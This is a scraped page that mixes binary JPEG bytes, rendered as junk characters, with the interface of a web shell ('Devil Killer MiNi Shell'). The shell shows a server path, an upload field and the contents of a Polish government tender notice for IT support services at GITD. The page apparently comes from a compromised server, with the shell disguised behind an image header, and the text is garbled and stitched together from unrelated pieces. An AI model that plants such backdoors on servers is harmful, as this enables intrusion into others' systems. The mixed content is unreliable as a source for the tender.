JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240522/0033474001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi wsparcia oraz rozwoju aplikacji i systemów wspierających procesy realizowane przez GITD. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Inspektorat Transportu Drogowego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017427604</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Jerozolimskie 94</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-807</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@gitd.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gitd.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi wsparcia oraz rozwoju aplikacji i systemów wspierających procesy realizowane przez GITD. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7770b5e2-129f-11ef-9381-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00334740</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00146017/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Wsparcie techniczne dotyczące projektów realizowanych w GITD</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi-gitd.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi-gitd.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postęp. prowadzone jest w jęz. polskim na elektronicznej Platformie Zakupowej pod adresem: https://przetargi gitd.ezamawiajacy.pl/servlet/HomeServlet i pod nazwą: Usługi wsparcia oraz rozwoju aplikacji i systemów wspierających procesy realizowane przez GITD znak sprawy: BDG.ZPB.230.8.2024.<br/>2.Komunik. w postęp. o udzielenie zamówienia odbywa się przy użyciu środków kom. elektronicznej, za pośrednictwem Platformy<br/>pod adresem wskazanym w pkt. 1. 3.Kom. między Zam a Wyk, w tym wszelkie oświad., wnioski, zawiadomienia oraz informacje<br/>przekazywane są za pośrednictwem Platformy, pod adresem wskazanym w pkt 1, z zastrzeżeniem pkt 10. UWAGA Podst.źródłem<br/>informacji jest Platforma, wszelkie fakultatywne powiad. za pomocą poczty e-mail obciążone są ryzykiem błędów związanych z<br/>działaniem serwerów pocztowych na których działanie Zam nie ma wpływu.4.Środki kom. elektr.wskazane w pkt 2. służące do<br/>odbioru dokum. elektronicznych zawierających oferty spełniają wymagania o których mowa w art. 68 ustawy Pzp oraz wskazane w §<br/>11 ust. 1 Rozp. PRM z dnia 30.12.2020 r. w sprawie sposobu sporządz. i przek. informacji oraz wymagań technicznych dla dokum.<br/>elektronicznych oraz środków kom. elektronicznej w post. o udzielenie zamówienia pub. lub konkursie Dz. U. z 2020 r. poz. 2452.<br/>5.Środki kom. elektronicznej wskazane w pkt 2. służące do odbioru dokum. elektronicznych zawierających oświadczenia, o których<br/>mowa w art. 125 ust 1 ustawy Pzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust 4 ustawy Pzp<br/>(oświadczenie Wyk wspólnie ubiegających się o zamówienie) oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe<br/>środki dowodowe, pełnomocnictwo, dokumenty, o których mowa w art. 94 ust. 2 ustawy Pzp jeżeli dotyczy zamówienia, oraz<br/>informacje, oświadczenia lub dokumenty, inne niż określone w pkt.4. umożliwiają identyfikację podmiotów<br/>przekazujących te dokumenty elektroniczne oraz ustalenie dokładnego czasu i daty ich odbioru.6.Korzystanie z Platformy jest<br/>bezpłatne. 7.Wszelką kores. związaną z niniejszym post. należy przekazywać za pośrednictwem Platformy. Kores. uważa się za<br/>przekazaną w terminie, jeżeli dotrze do Zam przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie<br/>potwierdzi fakt otrzymania wiadomości elektronicznej. 8.Kom. między Zam, a Wyk, w tym wszelkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, przekazywane są za pośrednictwem Platformy w zakładce Kores. (również Pyt.i odp). Za datę<br/>wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wczytania do Platformy i przekazania przy jej<br/>użyciu. 9.Wyk przystępując do post. o udzielenie zamówienia publ., tj. bezpłatnie rejestrując się lub, w przypadku posiadania konta w<br/>Platformie, logując się, akceptuje Regulamin zamieszczony na stronie internetowej: https://oneplace.marketplanet.pl/regulamin oraz<br/>warunki korzystania z Platformy wynikające z Instrukcji wskazanych w pkt 4.12.7. Cz. I SWZ a także uznaje je za wiążące. 10. Zam<br/>przewiduje możliwość kom. się z Wyk przy użyciu innych środków kom. elektronicznej niż Platforma oraz przy użyciu innych środków<br/>kom. niż środki kom. elektronicznej w zakresie dotyczącym udzielenia zamów. publ. tj. zawarcia umowy. 11 Zam informuje, iż w<br/>przypadku jakichkolwiek wątp. związanych z zasadami korzystania z Platformy Wyk. winien skontaktować się z dostawcą<br/>rozwiązania teleinform. Platforma zakup.GITD tel. +48 22 257 22 23 infol. dostępna w dni rob., w g. 9.00-17.00 e-mail:<br/>oneplace@marketplanet.pl. 12. Wym.tech. zawarte w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna zawarta w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna zawarta w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BDG.ZPB.230.8.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 356940,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest usługa wsparcia oraz rozwoju aplikacji i systemów wspierających procesy realizowane przez GITD.<br/>1.1.Zamówienie obejmuje: wsparcie pracowników Głównego Inspektoratu Transportu Drogowego w zakresie wytwarzania, utrzymania i rozwoju aplikacji oraz systemów wspierających procesy realizowane przez GITD. <br/>1.2.Wsparcie, o którym mowa powyżej obejmuje:<br/>a) wsparcie w zakresie zbierania wymagań dotyczących rozwoju obecnych oraz powstających systemów informatycznych,<br/>b) weryfikacja dokumentacji dotyczącej systemów informatycznych, wskazanie nieprawidłowości oraz obszarów niezbędnych do uzupełnienia,<br/>c) weryfikacja dokumentacji projektowej,<br/>d) weryfikacja jakości kodów źródłowych,<br/>e) weryfikacja poziomu bezpieczeństwa, <br/>f) weryfikacja spełnienia wymagań określonych w aktach prawnych dotyczących systemów informatycznych,<br/>g) weryfikacja stanu infrastruktury teleinformatycznej oraz planów zmian,<br/>h) projektowanie założeń oraz architektury dla aplikacji / systemów,<br/>i) wsparcie Zamawiającego w procesach odbioru produktów dostarczanych przez firmy zewnętrzne w ramach podpisanych umów,<br/>j) modelowanie oraz optymalizacja wybranych procesów biznesowych,<br/>k)wprowadzanie modyfikacji w systemach informatycznych Zamawiającego,<br/>l)wsparcie we wdrażaniu oprogramowania,<br/>m)	analizę pracochłonności zadań związanych z budową oraz rozwojem systemów,<br/>n)konsultacje w zakresie budowania oraz rozwoju systemów informatycznych.<br/>2.Szczegółowy Opis przedmiotu zamówienia został określony w<br/>Części III SWZ Opis przedmiotu zamówienia (OPZ) i IV SWZ Projektowanych Postanowieniach Umowy ( PPU). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72240000-9 - Usługi analizy systemu i programowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72253200-5 - Usługi w zakresie wsparcia systemu</p> <p class="mb-0">72200000-7 - Usługi doradcze w zakresie programowania oprogramowania</p> <p class="mb-0">72243000-0 - Usługi programowania</p> <p class="mb-0">72316000-3 - Usługi analizy danych</p> <p class="mb-0">72211000-7 - Usługi programowania oprogramowania systemowego i dla użytkownika</p> <p class="mb-0">72221000-0 - Usługi doradcze w zakresie analizy biznesowej</p> <p class="mb-0">72210000-0 - Usługi programowania pakietów oprogramowania</p> <p class="mb-0">72212000-4 - Usługi programowania oprogramowania aplikacyjnego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która przedstawia najkorzystniejszy bilans (najwyższa liczba punktów przyznanych w oparciu o ustalone kryteria), pozostałe oferty zostaną sklasyfikowane zgodnie z liczbą uzyskanych punktów.<br/>2. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>3. Ocena końcowa oferty w ramach wszystkich kryteriów oceny ofert stanowi sumę ocen cząstkowych w ramach poszczególnych kryteriów oceny ofert.<br/>4. Przyznawanie liczby punktów poszczególnym ofertom odbywać się będzie wg następujących zasad opisanych w cz II, lit. B SWZ - Kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba jednocześnie realizowanych zleceń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki, o których mowa w art. 112 ustawy Pzp, dotyczące: <br/>1.1.Zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia Wykonawcom wymagań w niniejszym postępowaniu.<br/>1.2.Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej: Zamawiający nie stawia Wykonawcom wymagań w niniejszym postępowaniu.<br/>1.3. Zdolności ekonomicznej lub finansowej<br/>Zamawiający nie stawia Wykonawcom wymagań w niniejszym postępowaniu.<br/>1.4. Zdolności zawodowej – w zakresie wiedzy i doświadczenia: <br/>Wykonawca musi wykazać, że należycie wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 (dwa) zamówienia polegające na:<br/>- wykonaniu i utrzymaniu przez okres co najmniej 12 miesięcy systemu informatycznego wspierającego procesy biznesowe dla co najmniej 100 użytkowników, o wartości <br/>nie mniejszej niż 200.000,00 zł brutto każde, <br/>i/lub<br/>- rozwoju i utrzymaniu przez okres co najmniej 12 miesięcy systemu informatycznego wspierającego procesy biznesowe dla co najmniej 100 użytkowników, o wartości <br/>nie mniejszej niż 200.000,00 zł brutto każde.<br/>Każde z zamówień, o których mowa powyżej obejmować musi co najmniej: <br/>1)	analizę biznesową,<br/>2)	projektowanie systemów lub zmian,<br/>3)	programowanie w technologiach Java lub .NET z wykorzystaniem relacyjnej bazy danych,<br/>4)	wdrożenie produkcyjnego.<br/>Pod pojęciem użytkownik Zamawiający rozumie aktywne konto dla jednej osoby fizycznej, zawierającej określone uprawnienia (zestaw ról) w ramach dostarczonego lub rozwijanego systemu informatycznego w wersji produkcyjnej. <br/>Uwaga !<br/>Przez jedno zamówienie rozumie się zamówienie w ramach jednej umowy, przy czym jeśli: <br/>- Wykonawca wykonywał zamówienie wspólnie z innym Wykonawcą (np. w ramach konsorcjum) uprawniony jest wykazać się/legitymować się jedynie swoim własnym doświadczeniem zdobytym w ramach realizowanego, w ramach konsorcjum zamówienia; <br/>Odnośnie do Wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>1.5.Zdolności technicznej - w zakresie posiadania potencjału kadrowego: <br/>Wykonawca jest zobowiązany wykazać, że dysponuje do realizacji przedmiotu zamówienia, co najmniej:<br/>1.5.1.	1 specjalistą ds. analizy biznesowej posiadającym odpowiednie kwalifikacje czyli co najmniej 5-letnie doświadczenie zawodowe w modelowaniu procesów potwierdzone udziałem, w roli Analityka Biznesowego, w realizacji co najmniej dwóch projektów informatycznych o wartości minimum 200.000,00 zł brutto każdy, zakończonych sukcesem tj. wdrożeniem produkcyjnym;<br/>1.5.2.	1 specjalistą ds. projektowania systemów posiadającym odpowiednie kwalifikacje czyli co najmniej 5-letnie doświadczenie zawodowe potwierdzone udziałem, w roli Architekta, w realizacji co najmniej jednego projektu o wartości minimum 200.000,00 zł brutto, zakończonego sukcesem tj. wdrożeniem produkcyjnym; <br/>1.5.3.	1 specjalistą ds. bezpieczeństwa systemów posiadającym odpowiednie kwalifikacje czyli co najmniej 5-letnie doświadczenie zawodowe z obszaru bezpieczeństwa systemów potwierdzone udziałem w realizacji co najmniej jednego projektu o wartości minimum 200.000,00 zł brutto, zakończonego sukcesem tj. wdrożeniem produkcyjnym oraz posiada przynajmniej jeden ważny certyfikat ze wskazanych w Rozporządzeniu Ministra Cyfryzacji z dnia 12.10. 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu (Dz. U. 2018 r. poz. 1999) w rozum. art. 15 ustawy z dnia 5 lipca 2018 r. o krajowym systemie cyberbezpieczeństwa (Dz.U. z 2023 r. poz. 913);<br/>1.5.4.	1 programistą posiadającym odpowiednie kwalifikacje zawodowe <br/>w programowaniu w technologii Java mającym minimum 5-letnie doświadczenie w projektach informatycznych potwierdzone udziałem w roli Programisty, w realizacji co najmniej 1 projektu o wartości minimum 200.000,00 zł brutto, zakończonego sukcesem tj. wdrożeniem produkcyjnym; <br/>1.5.5.	1 programistą posiadającym kwalifikacje i co najmniej 5-letnie doświadczenie zawodowe w programowaniu przy użyciu platformy .NET, potwierdzone udziałem w roli Programisty, w realizacji co najmniej jednego projektu o wartości minimum 200.000,00 zł brutto, zakończonego sukcesem tj. wdrożeniem produkcyjnym.<br/>Uwaga !<br/>Wymagania, w stosunku do potencjału kadrowego, określone powyżej są wymaganiami minimalnymi. <br/>Zamawiający zastrzega wymóg realizowania przedmiotu zamówienia przez osoby wskazane przez Wykonawcę w Wykazie doświadczenia członków zespołu na zasadach określonych w Umowie.<br/>Wykonawca może wskazać więcej osób niż wymagane minimum. W przypadku wskazania więcej niż jednej osoby, każda z osób – w zależności od roli, którą będzie pełnić – musi spełniać wszystkie wymagania określone dla danej roli. Zamawiający dopuszcza wskazania tej samej osoby dla różnych ról. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający na podstawie art. 274 ust. 1 ustawy Pzp, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie, aktualnych na dzień złożenia niżej wymienionych podmiotowych środków dowodowych:<br/>1. Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, z art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego (zgodnie z wzorem określonym w Formularzu DP.3), o których mowa w:<br/>1) art. 108 ust. 1 z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605, ze zm.) <br/>2) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2024 r. poz. 507).<br/>II. Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedstawienia podmiotowych środków dowodowych, o których mowa w ust. I pkt. 1. dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.<br/><br/>III. W celu wstępnego potwierdzenia braku podstaw do wykluczenia oraz wstępnego potwierdzenia spełniania ww. warunków udziału w postępowaniu Wykonawca/ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia/podmioty udostępniające zasoby składają wraz z ofertą oświadczenie z art. 125 ust 1 Pzp, o którym mowa w Części II SWZ, które tymczasowo zastępuje wymagane przez Zamawiającego podmiotowe środki dowodowe, potwierdzając na dzień składania ofert spełnianie<br/>warunków udziału w postępowaniu i brak podstaw do wykluczenia.<br/>Szczegółowe wymagania w zakresie jego formy i sposobu złożenia zostały określone w ust. 7 pkt 7.2.-7.6. Część I SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, Zamawiający na podstawie art. 274 ust. 1 ustawy Pzp, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia niżej wymienionych podmiotowych środków dowodowych:<br/>1. W zakresie warunku dot. zdolności zawodowej w zakresie wiedzy i doświadczenia: wykaz wykonanych usług w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym 